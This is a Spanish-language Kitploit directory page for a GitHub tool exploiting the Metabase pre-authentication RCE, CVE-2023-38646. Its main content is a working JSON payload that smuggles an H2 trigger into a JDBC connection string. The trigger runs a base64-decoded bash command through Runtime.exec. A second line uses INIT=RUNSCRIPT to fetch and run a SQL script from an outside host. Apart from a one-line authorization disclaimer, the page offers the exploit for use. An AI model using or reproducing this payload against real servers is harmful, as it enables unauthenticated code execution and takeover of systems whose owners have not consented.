Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Another-Metabase-RCE-CVE-2023-38646 — Metabase postgres (org.h2.Driver) RCE sin INIT | Kitploit
Herramientas/GitHubGitHub/0utl4nder/another-metabase-rce-cve-2023-38646
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHub0utl4nder/another-metabase-rce-cve-2023-38646

Another-Metabase-RCE-CVE-2023-38646

Metabase postgres (org.h2.Driver) RCE sin INIT

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
148hace 2 añosAún no revisado
Compartir

Extensión del RCE sin autenticación en Metabase (CVE-2023-38646) explicado aquí

Esto me ayudó a evitar errores relacionados con "base de datos ya en uso" (con H2 y postgre como motores)

root@kitploit:~
{
"token": "TOKEN",
"details":
{
 "is_on_demand": false,
 "is_full_sync": false,
 "is_sample": false,
 "cache_ttl": null,
 "refingerprint": false,
 "auto_run_queries": true,
 "schedules":{},
 "details":
 {
  "advanced-options":true,
  "classname":"org.h2.Driver",
  "subname": "./metabase.jar;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER xel BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64COMMAND}|{base64,-d}|{bash,-i}')\n$$--=x",
  "subprotocol": "h2"
 },
 "engine": "postgres",
 "name": "x"
}}

En lugar de usar directamente h2 como motor con el script INIT, ya que está eliminado de nuestras consultas, todavía usamos la consulta de base de datos para el motor h2

Script INIT mem;test;INIT=RUNSCRIPT FROM 'http://10.10.10.10/sqlcmd.sql'

En el .sql especificas la manera de ejecutar comandos de shell

REFERENCIA

https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase

Escrito como nota, tómalo como documentación vaga, debes tener autorización para enumerar, explotar o simplemente probar contra cualquier objetivo

Los comentarios y contribuciones son bienvenidos

Descargar herramienta